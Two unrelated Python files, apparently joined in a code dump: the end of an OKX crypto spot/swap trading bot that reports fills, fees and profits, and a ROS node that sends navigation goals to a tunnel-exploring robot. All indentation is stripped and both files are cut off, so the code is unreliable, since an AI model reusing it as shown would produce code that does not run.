timestamp = datetime.now().isoformat(" ", "seconds")
#new_record_hour != record_hour:
if new_record_hour < 8:
if new_record_minute <59:
if new_record_second > 30:
amount_spot_info=[]
amount_swap_info=[]
pair_info=[]
# get_fills_result = tradeAPI.get_fills(limit=100)
for h in TradingPair:
#先找spot成交記錄
spot_fills_result = tradeAPI.get_fills(instId=h)
time.sleep(0.1)
for i in spot_fills_result['data']:
#先算交易费
Operation_info[h]['spot_trading_fee']=Operation_info[h]['spot_trading_fee']+float(i['fee'])*float(i['fillPx']) #它现货的反佣跟手续费是用它的币,要换算成usdt
timestamp=int(int(i['ts'])/1000)
#转换成localtime
time_local = time.localtime(timestamp)
#转换成新的时间格式(2016-05-05 20:28:54)
dt =time.strftime("%Y-%m-%d %H:%M:%S",time_local)
ddt=parse(dt)
#先选日期段
if ddt.day== new_record_day-1:
if i['side']=='sell':
Operation_info[h]['spot_sell_trading_net_amount']=Operation_info[h]['spot_sell_trading_net_amount']+float(i['fillSz'])*float(i['fillPx'])
Operation_info[h]['spot_trading_sell_size']=Operation_info[h]['spot_trading_sell_size']+float(i['fillSz'])
elif i['side']=='buy':
Operation_info[h]['spot_buy_trading_net_amount']=Operation_info[h]['spot_buy_trading_net_amount']+float(i['fillSz'])*float(i['fillPx'])
Operation_info[h]['spot_trading_buy_size']=Operation_info[h]['spot_trading_buy_size']+float(i['fillSz'])
#swap成交记录
swap_instrument_id=h+'-SWAP'
swap_fills_result = tradeAPI.get_fills(instId= swap_instrument_id)
time.sleep(0.1)
for i in swap_fills_result['data']:
#先算交易费
Operation_info[h]['swap_trading_fee']=Operation_info[h]['swap_trading_fee']+float(i['fee']) #它u本位合约的反佣跟手续费是用usdt,直接用
timestamp=int(int(i['ts'])/1000)
#转换成localtime
time_local = time.localtime(timestamp)
#转换成新的时间格式(2016-05-05 20:28:54)
dt =time.strftime("%Y-%m-%d %H:%M:%S",time_local)
ddt=parse(dt)
#先选日期段
if ddt.day== new_record_day-1:
if i['side']=='sell':
Operation_info[h]['swap_sell_trading_net_amount']=Operation_info[h]['swap_sell_trading_net_amount']+float(i['fillSz'])*float(i['fillPx'])*Necessary_info[h]['contract_val']
Operation_info[h]['swap_trading_sell_size']=Operation_info[h]['swap_trading_sell_size']+float(i['fillSz'])*Necessary_info[h]['contract_val']
elif i['side']=='buy':
Operation_info[h]['swap_buy_trading_net_amount']=Operation_info[h]['swap_buy_trading_net_amount']+float(i['fillSz'])*float(i['fillPx'])*Necessary_info[h]['contract_val']
Operation_info[h]['swap_trading_buy_size']=Operation_info[h]['swap_trading_buy_size']+float(i['fillSz'])*Necessary_info[h]['contract_val']
#计算交易size
average_spot_trading_size=precfloat((Operation_info[h]['spot_trading_sell_size']-Operation_info[h]['spot_trading_buy_size']),2)
average_swap_trading_size=precfloat((Operation_info[h]['swap_trading_sell_size']-Operation_info[h]['swap_trading_buy_size']),2)
if precfloat(Operation_info[h]['spot_trading_buy_size'],2) == 0 :
spot_buy_average_price = 0
else:
spot_buy_average_price = precfloat(Operation_info[h]['spot_buy_trading_net_amount']/Operation_info[h]['spot_trading_buy_size'],2)
if precfloat(Operation_info[h]['spot_trading_sell_size'],2) == 0 :
spot_sell_average_price = 0
else:
spot_sell_average_price = precfloat(Operation_info[h]['spot_sell_trading_net_amount']/Operation_info[h]['spot_trading_sell_size'],2)
if precfloat(Operation_info[h]['swap_trading_buy_size'],2) == 0 :
swap_buy_average_price = 0
else:
swap_buy_average_price = precfloat(Operation_info[h]['swap_buy_trading_net_amount']/Operation_info[h]['swap_trading_buy_size'],2)
if precfloat(Operation_info[h]['swap_trading_sell_size'],2) == 0 :
swap_sell_average_price = 0
else:
swap_sell_average_price = precfloat(Operation_info[h]['swap_sell_trading_net_amount']/Operation_info[h]['swap_trading_sell_size'],2)
key_list = []
value_list = []
key_list = ["现货买入成交额(USD)", "现货买入成交量(币)", "现货买入平均价格(USD)","现货卖出成交额(USD)", "现货卖出成交量(币)", "现货卖出平均价格(USD)",'现货交易累积手续费(USD)']
value_list = [str(precfloat(Operation_info[h]['spot_buy_trading_net_amount'],2)),str(precfloat(Operation_info[h]['spot_trading_buy_size'],2)),str(spot_buy_average_price),str(precfloat(Operation_info[h]['spot_sell_trading_net_amount'],2)),str(precfloat(Operation_info[h]['spot_trading_sell_size'],2)),str(spot_sell_average_price),str(precfloat(Operation_info[h]['spot_trading_fee'],5))]
amount_spot_pair_info = dict(zip(key_list, value_list))
B={h:amount_spot_pair_info}
amount_spot_info.append(B)
key_list = []
value_list = []
key_list = ["U本位合约买入成交额(USD)", "U本位合约买入成交量(币)", "U本位合约买入平均价格(USD)","U本位合约卖出成交额(USD)", "U本位合约卖出成交量(币)", "U本位合约卖出平均价格(USD)", "U本位合约交易累积手续费(USD)"]
value_list = [str(precfloat(Operation_info[h]['swap_buy_trading_net_amount'],2)),str(precfloat(Operation_info[h]['swap_trading_buy_size'],2)),str(swap_buy_average_price),str(precfloat(Operation_info[h]['swap_sell_trading_net_amount'],2)),str(precfloat(Operation_info[h]['swap_trading_sell_size'],2)),str(swap_sell_average_price),str(precfloat(Operation_info[h]['swap_trading_fee'],5))]
amount_swap_pair_info = dict(zip(key_list, value_list))
C={h:amount_swap_pair_info}
amount_swap_info.append(C)
#tutu = timestamp + "," + '交易对 '+ h +':'+'现货买进'+str(Operation_info[h]['spot_buy_trading_orders'])+'次,'+ '现货卖出'+str(Operation_info[h]['spot_sell_trading_orders'])+'次,'+'U本永续买进'+str(Operation_info[h]['swap_buy_trading_orders'])+'次,'+'U本永续卖出'+str(Operation_info[h]['swap_sell_trading_orders'])+'次。'
key_list = []
value_list = []
key_list = ["现货下单买进(非成交)", "现货下单卖出(非成交)", "U本永续下单买进(非成交)", "U本永续下单卖出(非成交)"]
value_list = [str(Operation_info[h]['spot_buy_trading_orders'])+'次', str(Operation_info[h]['spot_sell_trading_orders'])+'次',str(Operation_info[h]['swap_buy_trading_orders'])+'次',str(Operation_info[h]['swap_sell_trading_orders'])+'次']
pair_order_info = dict(zip(key_list, value_list))
A={h:pair_order_info}
pair_info.append(A)
tutu_1=amount_spot_info
sendmessage(tutu_1)
tutu_2=pair_info
sendmessage(tutu_2)
tutu_3=amount_swap_info
sendmessage(tutu_3)
# Operation_info[h]['swap_sell_trading_orders']
# Operation_info[h]['swap_buy_trading_orders']
# Operation_info[h]['spot_sell_trading_orders']
# Operation_info[h]['spot_buy_trading_orders']
time.sleep(30)
except (asyncio.TimeoutError, websockets.exceptions.ConnectionClosed) as e:
try:
await ws.send('ping')
res = await ws.recv()
print(res)
continue
except Exception as e:
print(e)
print("disconnected,connecting tradeA……")
# error存成csv
mapping = {}
kk = []
path = '/root/' + Customer_name + '_error_report.csv'
key_list = ['timestamp', 'error']
for key, value in zip(key_list, [datetime.now(), e]):
mapping[key] = value
kk.append(eval(json.dumps(mapping)))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
break
except Exception as e:
print(e)
print("disconnected,connecting tradeB……")
# error存成csv
mapping = {}
kk = []
path = '/root/' + Customer_name + '_error_report.csv'
key_list = ['timestamp', 'error']
for key, value in zip(key_list, [datetime.now(), e]):
mapping[key] = value
kk.append(eval(json.dumps(mapping)))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
continue
# unsubscribe channels
async def unsubscribe(url, api_key, passphrase, secret_key, channels):
async with websockets.connect(url) as ws:
# login
timestamp = str(get_local_timestamp())
login_str = login_params(timestamp, api_key, passphrase, secret_key)
await ws.send(login_str)
# print(f"send: {login_str}")
res = await ws.recv()
print(f"recv: {res}")
# unsubscribe
sub_param = {"op": "unsubscribe", "args": channels}
sub_str = json.dumps(sub_param)
await ws.send(sub_str)
print(f"send: {sub_str}")
res = await ws.recv()
print(f"recv: {res}")
# unsubscribe channels
async def unsubscribe_without_login(url, channels):
async with websockets.connect(url) as ws:
# unsubscribe
sub_param = {"op": "unsubscribe", "args": channels}
sub_str = json.dumps(sub_param)
await ws.send(sub_str)
print(f"send: {sub_str}")
res = await ws.recv()
print(f"recv: {res}")
def run_ws(api_key,secret_key,passphrase, channels,TT,MQ,AQ,TradingPair,param_set_list):
# pd.set_option('display.max_columns', None) # 显示完整的列
# pd.set_option('display.max_rows', None) # 显示完整的行
# pd.set_option('display.expand_frame_repr', False) # 设置不折叠数据
flag = '0'
# WebSocket公共频道
# 实盘
url_public = "wss://ws.okex.com:8443/ws/v5/public"
# 实盘
url_private = "wss://ws.okex.com:8443/ws/v5/private"
loop = asyncio.get_event_loop()
# 公共频道 不需要登录(行情,持仓总量,K线,标记价格,深度,资金费率等)
if TT=="public":
loop.run_until_complete(subscribe_without_login(url_public, channels,MQ,TradingPair))
# 私有频道 需要登录(账户,持仓,订单等)
if TT=="private":
loop.run_until_complete(subscribe(url_private, api_key, passphrase, secret_key, channels,AQ,TradingPair))
# 交易(下单,撤单,改单等)
if TT== "trade":
loop.run_until_complete(trade(url_private, api_key, passphrase, secret_key, MQ,AQ,TradingPair,param_set_list))
loop.close()
if __name__=='__main__':
#necessary factors for restAPI
#flag = '1'
#
api_key = ""
secret_key = ""
passphrase = ""
flag = '0'
publicAPI = Public.PublicAPI(api_key, secret_key, passphrase, False, flag)
tradeAPI = Trade.TradeAPI(api_key, secret_key, passphrase, False, flag)
accountAPI = Account.AccountAPI(api_key, secret_key, passphrase, False, flag)
marketAPI = Market.MarketAPI(api_key, secret_key, passphrase, False, flag)
TradingPair ={}
Customer_name=''
total_balance_hour = precfloat(accountAPI.get_account()['data'][0]['totalEq'], 3) #这是u
#total_balance = precfloat(accountAPI.get_account()['data'][0]['totalEq'], 3)
#一开始变数设置的位置
MarketQ = {}
for i in TradingPair:
MarketQ[i] = {"DEPTH5_SWAP": "", "DEPTH5_SPOT":"", "PRESENT_FUNDING": "","PREDICT_FUNDING":"","P_INFO_SWAP":'',"P_INFO_SPOT":'','INDEX_TICKERS_SPOT':'','INDEX_TICKERS_SWAP':'','MARK_PRICE_SWAP':''}
for j in MarketQ[i]:
MarketQ[i][j] = Queue()
AccountQ = {}
for i in TradingPair:
AccountQ[i] = {"POSITION_SWAP": "", "POSITION_SPOT": "","POSITION_MARGIN": "",'ORDERS_SWAP':"",'ORDERS_SPOT':"",'ORDERS_MARGIN':""}
for j in AccountQ[i]:
AccountQ[i][j] = Queue()
#funding rate
Nowtime = datetime.now()
record_minute = Nowtime.minute
record_hour = Nowtime.hour
Necessary_info = {}
Operation_info = {}
for i in TradingPair:
Necessary_info[i] = {}
Operation_info[i] = {}
for i in TradingPair:
time.sleep(1)
instId_fu, Present_Funding_Rate,Predict_Funding_Rate = funding_recalculate(i+'-SWAP')
instr_fu = instId_fu.split('-') #instrument_id,利用来编排名称位置
TP = instr_fu[0] + "-" + instr_fu[1]
if len(instr_fu)==3: #only swap gets funding rate, so 3
if MarketQ[TP]["PRESENT_FUNDING"].empty() == True:
MarketQ[TP]["PRESENT_FUNDING"].put(Present_Funding_Rate)
elif MarketQ[TP]["PRESENT_FUNDING"].empty() == False:
MarketQ[TP]["PRESENT_FUNDING"].get()
MarketQ[TP]["PRESENT_FUNDING"].put(Present_Funding_Rate)
swap_info = publicAPI.get_instruments('SWAP')['data']
time.sleep(0.2)
# print(swap_info)
for j in swap_info:
if j['instId'] == i + '-SWAP': # need to notice here's insId (SWAP)
Necessary_info[i]['swap_tick_size'] = float(j["tickSz"])
Necessary_info[i]['swap_tick_digit'] = np.log10(1 / float(j["tickSz"]))
Necessary_info[i]['contract_val'] = float(j['ctVal'])
Necessary_info[i]['swap_min_size'] = float(j['minSz'])
spot_info = publicAPI.get_instruments('SPOT')['data']
time.sleep(0.2)
for j in spot_info:
if j['instId'] == i : # need to notice here's insId (SWAP)
Necessary_info[i]['spot_tick_size'] = float(j["tickSz"])
Necessary_info[i]['spot_tick_digit'] = np.log10(1 / float(j["tickSz"]))
Necessary_info[i]['spot_min_size'] = float(j['minSz'])
param_set_list = {'maker_commission_spot':-0.00005,
'taker_commission_spot':0.0002,
'maker_commission_swap':-0.00001,
"taker_commission_swap":0.00022,
'tolerate_limit':1300,
'order_limit':500, #每次开仓量
'close_short_index' : 2 #平仓要几倍的出手量(相对于开仓)
}
channel_private = [{"channel": "positions", "instType": "MARGIN"},
{"channel": "positions", "instType": "SWAP"},
{"channel": "orders", "instType": "SPOT"},
{"channel": "orders", "instType": "MARGIN"},
{"channel": "orders", "instType": "SWAP"},
{"channel": "account"}
]
channel_public = []
for h in TradingPair:
spot_instrument_id = h
swap_instrument_id = h + '-SWAP'
# 订阅spot的指数行情
key_list = []
value_list = []
key_list = ["channel", "instId"]
value_list = ["index-tickers", spot_instrument_id]
spot_order_param = dict(zip(key_list, value_list))
channel_public.append(spot_order_param)
#订阅spot的深度五档
key_list = []
value_list = []
key_list = ["channel", "instId"]
value_list = ["books5", spot_instrument_id]
spot_order_param = dict(zip(key_list, value_list))
channel_public.append(spot_order_param)
#订阅Swap的深度五档
key_list = []
value_list = []
key_list = ["channel", "instId"]
value_list = ["books5", swap_instrument_id]
swap_order_param = dict(zip(key_list, value_list))
channel_public.append(swap_order_param)
# 订阅Swap的资金费率
key_list = []
value_list = []
key_list = ["channel", "instId"]
value_list = ["funding-rate", swap_instrument_id]
swap_order_param = dict(zip(key_list, value_list))
channel_public.append(swap_order_param)
channel_trade=[]
ws1 = Process( target=run_ws, args=(api_key,secret_key,passphrase, channel_private,"private",MarketQ,AccountQ,TradingPair,param_set_list))
ws2 = Process( target=run_ws, args=(api_key,secret_key,passphrase, channel_public,"public",MarketQ,AccountQ,TradingPair,param_set_list))
wst = Process( target=run_ws, args=(api_key,secret_key,passphrase, channel_trade,"trade",MarketQ,AccountQ,TradingPair,param_set_list))
ws1.start()
ws2.start()
wst.start()
while True:
# time.sleep(1)
try:
Nowtime = datetime.now()
new_record_second = Nowtime.second
new_record_minute = Nowtime.minute
new_record_hour = Nowtime.hour
for i in TradingPair:
Operation_info[i]['spot_bids_price5_forc'] = []
Operation_info[i]['spot_asks_price5_forc'] = []
try:
Operation_info[i]['spot_depth5'] = MarketQ[i]["DEPTH5_SPOT"].get(timeout=1)
except:
try:
Operation_info[i]['spot_depth5'] = Operation_info[i]['spot_depth5']
except:
Operation_info[i]['spot_depth5'] = marketAPI.get_orderbook(i , '5')['data']
print('我spot_depth5用restapi__9')
time.sleep(0.1)
for j in range(5):
Operation_info[i]['spot_bids_price5_forc'].append(float(Operation_info[i]['spot_depth5'][0]['bids'][j][0]))
Operation_info[i]['spot_asks_price5_forc'].append(float(Operation_info[i]['spot_depth5'][0]['asks'][j][0]))
new_spot_bid=float(Operation_info[i]['spot_bids_price5_forc'][0])
new_spot_ask=float(Operation_info[i]['spot_asks_price5_forc'][0])
spot_present_price = precfloat((new_spot_ask + new_spot_bid)/2,Necessary_info[i]['swap_tick_digit'])
instr_fu = i.split('-')
spot_currency=instr_fu[0]
try:
swap_dic = AccountQ[i]["POSITION_SWAP"].get(timeout=1)
Necessary_info[i]['swap_position_result'] = float(swap_dic['pos'])
if Necessary_info[i]['swap_position_result'] ==0:
Necessary_info[i]['swap_position_result'] = float(accountAPI.get_positions(instId=i+'-SWAP')['data'][0]['pos'])
time.sleep(0.2)
# Operation_info[i]['swap_position'] = float(swap_dic['pos'])
# except:
# total_swap_dic = accountAPI.get_positions('SWAP')['data']
except:
try:
Necessary_info[i]['swap_position_result'] = float(accountAPI.get_positions(instId=i+'-SWAP')['data'][0]['pos'])
time.sleep(0.2)
except:
Necessary_info[i]['swap_position_result'] = 0
try:
spot_dic = AccountQ[i]["POSITION_SPOT"].get(timeout=1)
# print('spot_dic_1',spot_dic)
Necessary_info[i]['spot_balance_result'] = float(spot_dic['cashBal'])
if Necessary_info[i]['spot_balance_result'] ==0:
Necessary_info[i]['spot_balance_result'] = float(accountAPI.get_account(instr_fu[0])['data'][0]['details'][0]['cashBal'])
time.sleep(0.5)
except:
total_spot_dic = accountAPI.get_account()['data'][0]['details']
time.sleep(0.5)
spot_cc_list=[]
if len(total_spot_dic)!=0:
for j in total_spot_dic:
TP=j['ccy']+'-USDT'
spot_cc_list.append(TP)
if i in spot_cc_list:
instr_fu = i.split('-')
for j in total_spot_dic:
if j['ccy']==instr_fu[0]:
Necessary_info[i]['spot_dic'] = j
spot_dic = Necessary_info[i]['spot_dic']
Necessary_info[i]['spot_balance_result'] = float(spot_dic['cashBal'])
else:
Necessary_info[i]['spot_balance_result']=0
else:
Necessary_info[i]['spot_balance_result']=0
compare_cal=Necessary_info[i]['swap_position_result']*Necessary_info[i]['contract_val']+Necessary_info[i]['spot_balance_result']
#因为一正一负,所以这里用加的
if Necessary_info[i]['spot_balance_result'] >0: #开正仓
if compare_cal*spot_present_price>500:
tutu=timestamp +','+i+'开正仓,现货比永续多'+ str(precfloat(abs(compare_cal*spot_present_price),3))+'美金'
sendmessage(tutu)
time.sleep(3)
elif compare_cal*spot_present_price<-500:
tutu=timestamp +','+i+'开正仓,永续比现货多'+ str(precfloat(abs(compare_cal*spot_present_price),3))+'美金'
sendmessage(tutu)
time.sleep(3)
elif Necessary_info[i]['spot_balance_result'] <0: #开负仓
if compare_cal*spot_present_price>500:
tutu=timestamp +','+i+'开负仓,永续比现货多'+ str(precfloat(abs(compare_cal*spot_present_price),3))+'美金'
sendmessage(tutu)
time.sleep(3)
elif compare_cal*spot_present_price<-500:
tutu=timestamp +','+i+'开负仓,现货比永续多'+ str(precfloat(abs(compare_cal*spot_present_price),3))+'美金'
sendmessage(tutu)
time.sleep(3)
if new_record_hour != record_hour:
# 母帐户U本位,U的总资产
account_asset = precfloat(accountAPI.get_account()['data'][0]['totalEq'], 3)
timestamp = datetime.now().isoformat(" ", "seconds")
#换算成eth
result = marketAPI.get_ticker('ETH-USDT')
eth_price = (float(result['data'][0]['askPx']) + float(result['data'][0]['bidPx'])) / 2
new_total_balance_hour = account_asset
new_total_balance_hour_eth = account_asset/eth_price
hour_profit = precfloat(new_total_balance_hour - total_balance_hour, 2)
hour_profit_eth = hour_profit/eth_price
hour_profit_percent = precfloat(hour_profit / total_balance_hour * 100, 2)
tutu = timestamp + ",目前总资产为" + str(precfloat(new_total_balance_hour,2)) + 'USDT,等于'+str(precfloat(new_total_balance_hour_eth,2))+'个eth'
sendmessage(tutu)
tutu = timestamp + ",每小时获利为" + str(precfloat(hour_profit,2)) + 'USDT,等于'+str(precfloat(hour_profit_eth,2))+'个eth'
sendmessage(tutu)
tutu = timestamp + ",每小时获利率为" + str(precfloat(hour_profit_percent,2)) + '%'
sendmessage(tutu)
record_hour = new_record_hour
if new_record_hour == 9 :
if new_record_minute == 0:
new_total_balance_day = account_asset
day_profit = precfloat(new_total_balance_day - total_balance_day, 2)
day_profit_eth = day_profit/eth_price
day_profit_percent = precfloat(day_profit / total_balance_day * 100, 2)
tutu = timestamp + ",每日获利为" + str(precfloat(day_profit,2)) + 'USDT,等于'+str(precfloat(day_profit_eth,2))+'个eth'
sendmessage(tutu)
tutu = timestamp + ",每日获利率为" + str(precfloat(day_profit_percent,2)) + '%'
sendmessage(tutu)
mapping = {}
kk = []
path = '/root/' + Customer_name + '_profit_report.csv'
key_list = ['timestamp', '单日获利(usdt)', '单日获利率(%)', '总资产净值(usdt)']
for key, value in zip(key_list, [timestamp, day_profit, day_profit_percent, new_total_balance_day]):
mapping[key] = value
kk.append(eval(json.dumps(mapping)))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
total_balance_day = new_total_balance_day
time.sleep(60)
time.sleep(5)
#系统重启
# tutu = timestamp + ",机器人重启"
# sendmessage(tutu)
#每半小时重启一次机器人
# if new_record_minute == 30:
# if new_record_second > 55:
# ws1.terminate()
# ws2.terminate()
# wst.terminate()
# restart_program()
# record_hour = new_record_hour #这行可能没用
# if new_record_hour == 9:
# if new_record_minute == 3:
# 母帐户U本位
# account_asset = precfloat(accountAPI.get_account()['data'][0]['totalEq'], 3)
# timestamp = datetime.now().isoformat(" ", "seconds")
# 换算成eth
# result = marketAPI.get_ticker('ETH-USDT')
# eth_price = (float(result['data'][0]['askPx']) + float(result['data'][0]['bidPx'])) / 2
# new_total_balance = account_asset/eth_price
# day_profit = precfloat(new_total_balance - total_balance, 2)
# day_profit_percent = precfloat(day_profit / total_balance * 100, 2)
# tutu = timestamp + ",目前总资产为" + str(new_total_balance) + '个eth'
# sendmessage_to_customer(tutu)
# tutu = timestamp + ",单日获利为" + str(day_profit) + '个eth'
# sendmessage_to_customer(tutu)
# tutu = timestamp + ",单日获利率为" + str(day_profit_percent) + '%'
# sendmessage_to_customer(tutu)
# total_balance = new_total_balance
# mapping = {}
# kk = []
# path = '/root/' + Customer_name + '_profit_report.csv'
# key_list = ['timestamp', '单日获利(eth)', '单日获利率(%)', '总资产净值(eth)']
# for key, value in zip(key_list, [timestamp, day_profit, day_profit_percent, total_balance]):
# mapping[key] = value
# kk.append(eval(json.dumps(mapping)))
# kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
# time.sleep(60)
# if new_record_minute % 10 ==0 :
# print(Nowtime)
# time.sleep(60)
if new_record_minute % 20 ==0 :
timestamp = datetime.now().isoformat(" ", "seconds")
tutu = timestamp + Customer_name+"机器人还活著"
# sendmessage(tutu)
time.sleep(61)
#record_minute = new_record_minute
#每八小时计算一次历史资金费率
if Nowtime.hour == 8 or Nowtime.hour == 16 or Nowtime.hour == 0:
if Nowtime.minute == 1:
for i in TradingPair:
instId_fu, Present_Funding_Rate,Predict_Funding_Rate = funding_recalculate(i+'-SWAP')
instr_fu = instId_fu.split('-')
TP = instr_fu[0] + "-" + instr_fu[1]
if len(instr_fu) == 3: # only swap gets funding rate, so 3
if MarketQ[TP]["PRESENT_FUNDING"].empty() == True:
MarketQ[TP]["PRESENT_FUNDING"].put(Present_Funding_Rate)
elif MarketQ[TP]["PRESENT_FUNDING"].empty() == False:
MarketQ[TP]["PRESENT_FUNDING"].get()
MarketQ[TP]["PRESENT_FUNDING"].put(Present_Funding_Rate)
except:
pass
# ws1.join()
# ws2.join()
# wst.join()
|
goal_generation_node.py
|
#!/bin/python3
from math import sqrt
import time
import rospy
import std_msgs.msg as ros_std_msg
import geometry_msgs.msg as ros_geom_msg
from threading import Thread
import numpy as np
from datetime import datetime
import tf
import actionlib
import move_base_msgs.msg as ros_mb_msg
import gazebo_msgs.srv as ros_gz_srv
import copy
# --------------------
# GENERAL NOTES
# - In this script, a semantic navigation system is implemented for a robot in
# an underground environment. The expected inputs for this node are:
# - /gallery_angles: These are obtained by a different node. List of
# angles wrt the robot in which direction a gallery is found. This also
# includes the current gallery aka, the front and the back.
# - /tile_type: This topic should continually publish whether the robot is
# in an intersection, a rect, a curve etc...
#
#
# --------------------
def euler_to_quaternion(yaw, pitch, roll):
qx = np.sin(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) - \
np.cos(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)
qy = np.cos(roll/2) * np.sin(pitch/2) * np.cos(yaw/2) + \
np.sin(roll/2) * np.cos(pitch/2) * np.sin(yaw/2)
qz = np.cos(roll/2) * np.cos(pitch/2) * np.sin(yaw/2) - \
np.sin(roll/2) * np.sin(pitch/2) * np.cos(yaw/2)
qw = np.cos(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) + \
np.sin(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)
return [qx, qy, qz, qw]
class Nodo:
"""La clase nodo está pensada para almacenar
los distintos nodos del mapa, así como las
relaciones entre las diferentes galerías que
a las que está conectado."""
def __init__(self, map, n_galleries):
self.n_galleries = n_galleries
class Galeria:
def __init__(self, map):
# A gallery can only connect two nodes
self.map = map
self.nodes = [None, None]
class Mapa:
"""La clase mapa está pensada para almacenar
una serie de nodos conectados por galerías,
y conservar las relaciones entre estos nodos"""
def __init__(self) -> None:
self.nodes = list()
self.galleries = list()
class GoalGenerationNode:
def __init__(self, goal_time_interval=1, goal_distance=3):
self.n_instruction = 0
self.goal_time_interval = goal_time_interval
self.goal_distance = goal_distance
self.reset_quadrants()
self.time = datetime.now()
self.seq = 0
self.can_send_goal = True
rospy.init_node(self.__class__.__name__)
self.instructions = rospy.get_param("/instructions")
self.final_blocker_position_x = rospy.get_param(
"/final_blocker_position_x")
self.final_blocker_position_y = rospy.get_param(
"/final_blocker_position_y")
self.listener = tf.TransformListener()
self.tf_transformer = tf.TransformerROS()
self.tile_type_subscriber = rospy.Subscriber(
"/environment_label", ros_std_msg.String, callback=self.tile_type_callback)
self.gallery_subscriber = rospy.Subscriber(
"/gallery_detection_vector", ros_std_msg.Float32MultiArray, self.gallery_detection_callback)
self.move_base_client = actionlib.SimpleActionClient(
"move_base", ros_mb_msg.MoveBaseAction)
self.get_robot_pose_client = rospy.ServiceProxy(
"/gazebo/get_model_state", ros_gz_srv.GetModelState)
if not self.move_base_client.wait_for_server(rospy.Duration(5)):
rospy.logerr("THERE IS NO MOVE BASE NODE")
self.first_callback = False
while not self.first_callback:
rospy.sleep(0.5)
self.run_thread = Thread(target=self.run)
self.already_chosen_exit = False
self.run_thread.start()
self.run_thread.join()
def reset_quadrants(self):
self.quadrants = {"front": [],
"left": [],
"right": [],
"back": []
}
def tile_type_callback(self, msg: ros_std_msg.String):
self.tile_type = msg.data
def array_position_to_angle(self, array_position):
return 180 - array_position
def get_galleries_from_vector(self, vector):
self.vector = vector
self.filtered = np.zeros(360)
for i in range(360):
to_check = vector[i]
self.filtered[i] = to_check
for j in range(31):
subsection_index = ((-15 + j) + i) % 356
if vector[subsection_index] > to_check:
self.filtered[i] = 0
max_peak = np.max(self.filtered)
galleries_indices = np.nonzero(self.filtered > max_peak * 0.6)
galleries_angles = []
for index in galleries_indices:
galleries_angles.append(
self.array_position_to_angle(index)/180.0 * np.math.pi)
return np.array(galleries_angles)[0]
def gallery_detection_callback(self, msg: ros_std_msg.Float32MultiArray):
""" This function should take the input from the neural network, and
translate it to quadrants"""
data = np.array(msg.data)
angles_of_galleries = self.get_galleries_from_vector(data)
quadrants = {"front": [],
"left": [],
"right": [],
"back": []
}
for angle in angles_of_galleries:
if angle > -np.math.pi/4 and angle < np.math.pi/4:
quadrants["front"].append(angle)
elif angle > -np.math.pi*3/4 and angle < -np.math.pi/4:
quadrants["right"].append(angle)
elif angle > np.math.pi/4 and angle < np.math.pi*3/4:
quadrants["left"].append(angle)
elif angle > np.math.pi*3/4 or angle < -np.math.pi*3/4:
quadrants["back"].append(angle)
if self.quadrants["back"].__len__() > 0 and self.tile_type == "block":
if self.n_instruction == self.instructions.__len__():
robot_pose = self.get_robot_pose_client.call(
ros_gz_srv.GetModelStateRequest("/", ""))
assert(isinstance(robot_pose, ros_gz_srv.GetModelStateResponse))
rx = robot_pose.pose.position.x
ry = robot_pose.pose.position.y
if ((self.final_blocker_position_x-rx)**2+(self.final_blocker_position_y-ry)**2)**0.5 < 10:
rospy.set_param("/test_status", "success")
return
else:
self.send_fail_message()
return
if not self.can_send_goal:
return
self.quadrants = copy.deepcopy(quadrants)
n = 0
for k in self.quadrants.keys():
if self.quadrants[k].__len__() > 0:
n += 1
self.in_intersection = n > 2
self.first_callback = True
self.generate_and_send_goal()
def is_there_exit(self, quadrant: str):
return len(self.quadrants[quadrant]) > 0
def goal_from_angle(self, angle, distance=0):
goal = ros_geom_msg.PoseStamped()
goal.header.frame_id = "base_link"
goal.header.seq = self.seq
goal.header.stamp = rospy.Time.now()
self.seq += 1
quaternion = euler_to_quaternion(angle, 0, 0)
goal.pose.orientation.x = quaternion[0]
goal.pose.orientation.y = quaternion[1]
goal.pose.orientation.z = quaternion[2]
goal.pose.orientation.w = quaternion[3]
if distance == 0:
D = self.goal_distance
else:
D = distance
goal.pose.position.x = D * np.math.cos(angle)
goal.pose.position.y = D * np.math.sin(angle)
goal.pose.position.z = 0
# Transform the goal to the map frame
t = self.listener.getLatestCommonTime("odom", "base_link")
self.tf_transformer._buffer = self.listener._buffer
goal.header.stamp = t
goal = self.tf_transformer.transformPose("odom", goal)
goal_msg = ros_mb_msg.MoveBaseGoal()
goal_msg.target_pose = goal
return goal_msg
def send_fail_message(self):
rospy.set_param("/test_status", "fail")
return
def generate_and_send_goal(self):
self.can_send_goal = False
goal_msg = self.goal_from_angle(0, 0.0)
if self.in_intersection:
print("IN INTERSECTION")
if self.already_chosen_exit:
print("ALREADY CHOSEN EXIT, GOING FRONT")
if self.quadrants["front"].__len__() == 0:
self.send_fail_message()
return
else:
goal_msg = self.goal_from_angle(self.quadrants["front"][0])
else:
if self.n_instruction == self.instructions.__len__():
self.send_fail_message()
return
inst = self.instructions[self.n_instruction]
print("NOT CHOSEN EXIT, GOING {}".format(inst))
if self.quadrants[inst].__len__() == 0:
self.send_fail_message()
return
goal_msg = self.goal_from_angle(
self.quadrants[inst][0])
self.already_chosen_exit = True
self.n_instruction += 1
else:
self.already_chosen_exit = False
if self.quadrants["front"].__len__() > 0:
goal_msg = self.goal_from_angle(self.quadrants["front"][0])
elif self.quadrants["right"].__len__() > 0:
goal_msg = self.goal_from_angle(self.quadrants["right"][0])
elif self.quadrants["left"].__len__() > 0:
goal_msg = self.goal_from_angle(self.quadrants["left"][0])
elif self.quadrants["back"].__len__() > 0 and self.tile_type == "block":
if self.n_instruction == self.instructions.__len__():
robot_pose = self.get_robot_pose_client.call(
ros_gz_srv.GetModelStateRequest("/", ""))
assert(isinstance(robot_pose, ros_gz_srv.GetModelStateResponse))
rx = robot_pose.pose.position.x
ry = robot_pose.pose.position.y
if ((self.final_blocker_position_x-rx)**2+(self.final_blocker_position_y-ry)**2)**0.5 < 10:
rospy.set_param("/test_status", "success")
return
else:
self.send_fail_message()
return
else:
self.send_fail_message()
return
else:
